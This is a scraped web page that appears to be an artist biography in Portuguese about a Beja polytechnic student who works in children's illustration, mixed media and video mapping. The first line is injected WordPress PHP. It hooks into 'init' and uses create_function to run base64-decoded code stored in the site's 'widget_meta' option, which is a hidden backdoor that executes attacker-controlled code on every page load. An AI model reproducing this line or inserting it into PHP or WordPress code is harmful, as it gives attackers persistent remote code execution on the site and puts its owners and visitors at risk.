add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
Ingressou no curso de licenciatura em Artes Plásticas e Multimédia do Instituto Politécnico de Beja (IPBeja) em 2011 e, neste momento, encontra-se a concluir o curso.
Desde a sua infância, Catarina ocupava os seus tempos-livres a desenhar e a pintar, onde já demonstrava interesse em explorar vários materiais para criar as suas composições abstractas. Para além disso, sempre mostrou um interesse particular pela criação de animações 2D e Character Design – criava as suas personagens caricaturadas e irreais com o intuito de as incluir nas suas próprias animações.
Acredita profundamente que este background permitiu ao longo da licenciatura aprofundar e desenvolver competências nos domínios da Ilustração, Animação 2D e edição de Vídeo.
Demonstra especial interesse pelo estudo e compreensão do desenho infantil e pelo imaginário das crianças, motivo pelo qual decidiu se dedicar à ilustração infantil editorial. A intenção é contribuir para uma criativa relação entre a linguagem plástica e linguagem verbal.
Sendo uma sonhadora nata e criativa, sente uma necessidade enorme de transparecer nas suas ilustrações todo o reboliço de ideias que habitam dentro da sua cabeça.
Ansiosa para alcançar sempre a perfeição em cada ilustração que faz, explora a técnica do mixed media. Ao fazê-lo, gera uma relação intimista que tira partido da técnica digital e da técnica analógica para criar texturas que enriquecem visualmente o seu trabalho .
Participou em vários concursos nacionais de Ilustração e em exposições colectivas no âmbito das Artes Plásticas e Multimédia. Mais recentemente, com a criação de um grupo de jovens artistas, Virginity Breakers, aposta na área do VídeoMapping, organizando exposições com participações na XIX Edição dos Distúrbios Culturais e na Galeria do Desassossego em Beja. Read Less